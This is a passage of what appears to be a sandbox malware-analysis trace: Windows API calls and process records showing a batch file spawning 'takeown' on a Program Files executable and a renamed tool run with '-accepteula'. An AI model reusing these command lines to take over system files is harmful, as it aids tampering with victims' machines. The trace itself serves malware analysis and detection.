[0207.696] GetFileType (hFile=0x7) returned 0x2 [0207.697] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.697] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30ec84 | out: lpMode=0x30ec84) returned 1 [0207.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.697] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30ecb0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30ecb0*=0x2) returned 1 [0207.700] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0207.700] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x30ecc0 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0207.700] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x30ecc0 | out: _Buffer=">") returned 1 [0207.700] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.700] GetFileType (hFile=0x7) returned 0x2 [0207.701] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.701] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30ec88 | out: lpMode=0x30ec88) returned 1 [0207.701] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.701] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x30ecb4, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x30ecb4*=0x26) returned 1 [0207.701] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.701] GetFileType (hFile=0x7) returned 0x2 [0207.702] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.702] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30ef0c | out: lpMode=0x30ef0c) returned 1 [0207.702] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.702] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x30ef38, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x30ef38*=0x1) returned 1 [0207.702] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.702] GetFileType (hFile=0x7) returned 0x2 [0207.703] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.703] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30eef0 | out: lpMode=0x30eef0) returned 1 [0207.703] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.703] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5b4b00*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x30ef1c, lpReserved=0x0 | out: lpBuffer=0x5b4b00*, lpNumberOfCharsWritten=0x30ef1c*=0xc) returned 1 [0207.703] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x30ef28 | out: _Buffer=" -accepteula -c Run -y -p extract -nobanner ") returned 44 [0207.703] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.703] GetFileType (hFile=0x7) returned 0x2 [0207.704] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.704] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30eee8 | out: lpMode=0x30eee8) returned 1 [0207.704] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.704] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x30ef14, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30ef14*=0x2c) returned 1 [0207.706] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x30ef44 | out: _Buffer=") ") returned 2 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.706] GetFileType (hFile=0x7) returned 0x2 [0207.706] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.706] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30ef04 | out: lpMode=0x30ef04) returned 1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.707] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30ef30, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30ef30*=0x2) returned 1 [0207.707] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x30ef64 | out: _Buffer="\r\n") returned 2 [0207.707] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.707] GetFileType (hFile=0x7) returned 0x2 [0207.707] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.707] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30ef24 | out: lpMode=0x30ef24) returned 1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.708] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30ef50, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30ef50*=0x2) returned 1 [0207.709] GetConsoleTitleW (in: lpConsoleTitle=0x30ea74, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.711] GetConsoleTitleW (in: lpConsoleTitle=0x30e808, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.711] InitializeProcThreadAttributeList (in: lpAttributeList=0x30e690, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30e758 | out: lpAttributeList=0x30e690, lpSize=0x30e758) returned 1 [0207.711] UpdateProcThreadAttribute (in: lpAttributeList=0x30e690, dwFlags=0x0, Attribute=0x60001, lpValue=0x30e750, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30e690, lpPreviousValue=0x0) returned 1 [0207.711] GetStartupInfoW (in: lpStartupInfo=0x30e64c | out: lpStartupInfo=0x30e64c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0207.726] CloseHandle (hObject=0x84) returned 1 [0207.726] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0207.726] GetProcessHeap () returned 0x590000 [0207.726] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a5f80 | out: hHeap=0x590000) returned 1 [0207.726] GetEnvironmentStringsW () returned 0x5a4bf8* [0207.726] GetProcessHeap () returned 0x590000 [0207.726] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb7c) returned 0x5a5f80 [0207.726] FreeEnvironmentStringsW (penv=0x5a4bf8) returned 1 [0207.726] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0218.537] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x30e62c | out: lpExitCode=0x30e62c*=0x1) returned 1 [0218.537] CloseHandle (hObject=0x74) returned 1 [0218.537] _vsnwprintf (in: _Buffer=0x30e774, _BufferCount=0x13, _Format="%08X", _ArgList=0x30e638 | out: _Buffer="00000001") returned 8 [0218.537] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0218.537] GetProcessHeap () returned 0x590000 [0218.537] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a5f80 | out: hHeap=0x590000) returned 1 [0218.537] GetEnvironmentStringsW () returned 0x5a4bf8* [0218.538] GetProcessHeap () returned 0x590000 [0218.538] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb7c) returned 0x5a5f80 [0218.538] FreeEnvironmentStringsW (penv=0x5a4bf8) returned 1 [0218.538] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0218.538] GetProcessHeap () returned 0x590000 [0218.538] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a5f80 | out: hHeap=0x590000) returned 1 [0218.538] GetEnvironmentStringsW () returned 0x5a4bf8* [0218.538] GetProcessHeap () returned 0x590000 [0218.538] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb7c) returned 0x5a5f80 [0218.538] FreeEnvironmentStringsW (penv=0x5a4bf8) returned 1 [0218.538] GetProcessHeap () returned 0x590000 [0218.538] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x590d00 | out: hHeap=0x590000) returned 1 [0218.538] DeleteProcThreadAttributeList (in: lpAttributeList=0x30e690 | out: lpAttributeList=0x30e690) [0218.539] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.539] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0218.540] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.540] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0218.540] _get_osfhandle (_FileHandle=0) returned 0x3 [0218.540] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0218.541] SetConsoleInputExeNameW () returned 0x1 [0218.541] GetConsoleOutputCP () returned 0x1b5 [0218.541] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0218.541] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.541] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x30f05c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0218.542] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0218.542] _get_osfhandle (_FileHandle=3) returned 0x74 [0218.542] SetFilePointer (in: hFile=0x74, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0218.542] GetProcessHeap () returned 0x590000 [0218.542] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4920 | out: hHeap=0x590000) returned 1 [0218.542] GetProcessHeap () returned 0x590000 [0218.542] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a47f0 | out: hHeap=0x590000) returned 1 [0218.542] GetProcessHeap () returned 0x590000 [0218.542] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a46c8 | out: hHeap=0x590000) returned 1 [0218.542] GetProcessHeap () returned 0x590000 [0218.543] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a22f0 | out: hHeap=0x590000) returned 1 [0218.543] GetProcessHeap () returned 0x590000 [0218.543] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4640 | out: hHeap=0x590000) returned 1 [0218.543] GetProcessHeap () returned 0x590000 [0218.543] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4428 | out: hHeap=0x590000) returned 1 [0218.543] GetProcessHeap () returned 0x590000 [0218.543] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b4b40 | out: hHeap=0x590000) returned 1 [0218.543] GetProcessHeap () returned 0x590000 [0218.543] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b4af8 | out: hHeap=0x590000) returned 1 [0218.543] GetProcessHeap () returned 0x590000 [0218.543] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x590d18 | out: hHeap=0x590000) returned 1 [0218.543] GetProcessHeap () returned 0x590000 [0218.543] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4360 | out: hHeap=0x590000) returned 1 [0218.543] GetProcessHeap () returned 0x590000 [0218.543] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x590d30 | out: hHeap=0x590000) returned 1 [0218.543] GetProcessHeap () returned 0x590000 [0218.543] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4328 | out: hHeap=0x590000) returned 1 [0218.543] GetProcessHeap () returned 0x590000 [0218.543] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a42c8 | out: hHeap=0x590000) returned 1 [0218.543] GetProcessHeap () returned 0x590000 [0218.543] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4298 | out: hHeap=0x590000) returned 1 [0218.543] GetProcessHeap () returned 0x590000 [0218.543] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4238 | out: hHeap=0x590000) returned 1 [0218.543] GetProcessHeap () returned 0x590000 [0218.543] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a41d8 | out: hHeap=0x590000) returned 1 [0218.543] GetProcessHeap () returned 0x590000 [0218.543] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4160 | out: hHeap=0x590000) returned 1 [0218.543] GetProcessHeap () returned 0x590000 [0218.543] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x591268 | out: hHeap=0x590000) returned 1 [0218.543] GetProcessHeap () returned 0x590000 [0218.543] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x59f4b8 | out: hHeap=0x590000) returned 1 [0218.543] GetProcessHeap () returned 0x590000 [0218.544] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x591218 | out: hHeap=0x590000) returned 1 [0218.544] GetProcessHeap () returned 0x590000 [0218.544] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5911b8 | out: hHeap=0x590000) returned 1 [0218.544] _get_osfhandle (_FileHandle=3) returned 0x74 [0218.544] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0218.544] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x30f040, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x30f040*=0x0, lpOverlapped=0x0) returned 1 [0218.544] GetLastError () returned 0x0 [0218.544] _get_osfhandle (_FileHandle=3) returned 0x74 [0218.544] GetFileType (hFile=0x74) returned 0x1 [0218.544] _get_osfhandle (_FileHandle=3) returned 0x74 [0218.544] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0218.544] GetProcessHeap () returned 0x590000 [0218.544] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400a) returned 0x5b4af8 [0218.544] GetProcessHeap () returned 0x590000 [0218.544] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b4af8 | out: hHeap=0x590000) returned 1 [0218.545] _get_osfhandle (_FileHandle=3) returned 0x74 [0218.545] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0218.545] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x30f024, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x30f024*=0x0, lpOverlapped=0x0) returned 1 [0218.545] GetLastError () returned 0x0 [0218.545] _get_osfhandle (_FileHandle=3) returned 0x74 [0218.545] GetFileType (hFile=0x74) returned 0x1 [0218.545] _get_osfhandle (_FileHandle=3) returned 0x74 [0218.545] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0218.545] GetProcessHeap () returned 0x590000 [0218.545] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400a) returned 0x5b4af8 [0218.546] GetProcessHeap () returned 0x590000 [0218.546] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b4af8 | out: hHeap=0x590000) returned 1 [0218.546] longjmp () [0218.546] _tell (_FileHandle=3) returned 226 [0218.546] _close (_FileHandle=3) returned 0 [0218.546] CmdBatNotification () returned 0x1 [0218.546] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.546] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0218.547] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.547] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0218.547] _get_osfhandle (_FileHandle=0) returned 0x3 [0218.547] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0218.547] SetConsoleInputExeNameW () returned 0x1 [0218.547] GetConsoleOutputCP () returned 0x1b5 [0218.548] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0218.548] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.548] exit (_Code=1) Process: id = "157" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x33899000" os_pid = "0xa04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "140" os_parent_pid = "0x24c" cmd_line = "takeown /F \"C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 672 os_tid = 0x99c Process: id = "158" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x331a0000" os_pid = "0x614" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "132" os_parent_pid = "0x7b0" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"executed_florists.exe\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 667 os_tid = 0x5b4 [0168.127] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2eff34 | out: lpSystemTimeAsFileTime=0x2eff34*(dwLowDateTime=0x1e26cf00, dwHighDateTime=0x1d68287)) [0168.127] GetCurrentProcessId () returned 0x614 [0168.127] GetCurrentThreadId () returned 0x5b4 [0168.128] GetTickCount () returned 0x1156f66 [0168.128] QueryPerformanceCounter (in: lpPerformanceCount=0x2eff2c | out: lpPerformanceCount=0x2eff2c*=28846656833) returned 1 [0168.130] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0168.131] __set_app_type (_Type=0x1) [0168.131] __p__fmode () returned 0x770331f4 [0168.131] __p__commode () returned 0x770331fc [0168.131] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0168.131] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0168.131] GetCurrentThreadId () returned 0x5b4 [0168.132] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x5b4) returned 0x60 [0168.132] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0168.132] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0168.132] SetThreadUILanguage (LangId=0x0) returned 0x409 [0168.132] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0168.133] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efec4 | out: phkResult=0x2efec4*=0x0) returned 0x2 [0168.133] VirtualQuery (in: lpAddress=0x2efefb, lpBuffer=0x2efe94, dwLength=0x1c | out: lpBuffer=0x2efe94*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.133] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efe94, dwLength=0x1c | out: lpBuffer=0x2efe94*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0168.133] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efe94, dwLength=0x1c | out: lpBuffer=0x2efe94*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0168.133] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efe94, dwLength=0x1c | out: lpBuffer=0x2efe94*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.133] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efe94, dwLength=0x1c | out: lpBuffer=0x2efe94*(BaseAddress=0x2f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x170000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0168.133] GetConsoleOutputCP () returned 0x1b5 [0168.133] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0168.134] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0168.134] _get_osfhandle (_FileHandle=1) returned 0x80 [0168.134] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0168.134] _get_osfhandle (_FileHandle=1) returned 0x80 [0168.134] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0168.134] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.134] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0168.136] GetEnvironmentStringsW () returned 0x662220* [0168.136] GetProcessHeap () returned 0x650000 [0168.136] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb92) returned 0x662dc0 [0168.137] FreeEnvironmentStringsW (penv=0x662220) returned 1 [0168.137] GetProcessHeap () returned 0x650000 [0168.137] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4) returned 0x65ec20 [0168.137] GetEnvironmentStringsW () returned 0x662220* [0168.137] GetProcessHeap () returned 0x650000 [0168.137] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb92) returned 0x663960 [0168.138] FreeEnvironmentStringsW (penv=0x662220) returned 1 [0168.138] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eee34 | out: phkResult=0x2eee34*=0x68) returned 0x0 [0168.138] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eee3c, lpData=0x2eee40, lpcbData=0x2eee38*=0x1000 | out: lpType=0x2eee3c*=0x0, lpData=0x2eee40*=0x0, lpcbData=0x2eee38*=0x1000) returned 0x2 [0168.138] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eee3c, lpData=0x2eee40, lpcbData=0x2eee38*=0x1000 | out: lpType=0x2eee3c*=0x4, lpData=0x2eee40*=0x1, lpcbData=0x2eee38*=0x4) returned 0x0 [0168.138] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eee3c, lpData=0x2eee40, lpcbData=0x2eee38*=0x1000 | out: lpType=0x2eee3c*=0x0, lpData=0x2eee40*=0x1, lpcbData=0x2eee38*=0x1000) returned 0x2 [0168.138] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eee3c, lpData=0x2eee40, lpcbData=0x2eee38*=0x1000 | out: lpType=0x2eee3c*=0x4, lpData=0x2eee40*=0x0, lpcbData=0x2eee38*=0x4) returned 0x0 [0168.138] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eee3c, lpData=0x2eee40, lpcbData=0x2eee38*=0x1000 | out: lpType=0x2eee3c*=0x4, lpData=0x2eee40*=0x40, lpcbData=0x2eee38*=0x4) returned 0x0 [0168.138] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eee3c, lpData=0x2eee40, lpcbData=0x2eee38*=0x1000 | out: lpType=0x2eee3c*=0x4, lpData=0x2eee40*=0x40, lpcbData=0x2eee38*=0x4) returned 0x0 [0168.139] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eee3c, lpData=0x2eee40, lpcbData=0x2eee38*=0x1000 | out: lpType=0x2eee3c*=0x0, lpData=0x2eee40*=0x40, lpcbData=0x2eee38*=0x1000) returned 0x2 [0168.139] RegCloseKey (hKey=0x68) returned 0x0 [0168.139] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eee34 | out: phkResult=0x2eee34*=0x68) returned 0x0 [0168.139] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eee3c, lpData=0x2eee40, lpcbData=0x2eee38*=0x1000 | out: lpType=0x2eee3c*=0x0, lpData=0x2eee40*=0x40, lpcbData=0x2eee38*=0x1000) returned 0x2 [0168.139] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eee3c, lpData=0x2eee40, lpcbData=0x2eee38*=0x1000 | out: lpType=0x2eee3c*=0x4, lpData=0x2eee40*=0x1, lpcbData=0x2eee38*=0x4) returned 0x0 [0168.139] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eee3c, lpData=0x2eee40, lpcbData=0x2eee38*=0x1000 | out: lpType=0x2eee3c*=0x0, lpData=0x2eee40*=0x1, lpcbData=0x2eee38*=0x1000) returned 0x2 [0168.139] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eee3c, lpData=0x2eee40, lpcbData=0x2eee38*=0x1000 | out: lpType=0x2eee3c*=0x4, lpData=0x2eee40*=0x0, lpcbData=0x2eee38*=0x4) returned 0x0 [0168.139] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eee3c, lpData=0x2eee40, lpcbData=0x2eee38*=0x1000 | out: lpType=0x2eee3c*=0x4, lpData=0x2eee40*=0x9, lpcbData=0x2eee38*=0x4) returned 0x0 [0168.139] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eee3c, lpData=0x2eee40, lpcbData=0x2eee38*=0x1000 | out: lpType=0x2eee3c*=0x4, lpData=0x2eee40*=0x9, lpcbData=0x2eee38*=0x4) returned 0x0 [0168.140] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eee3c, lpData=0x2eee40, 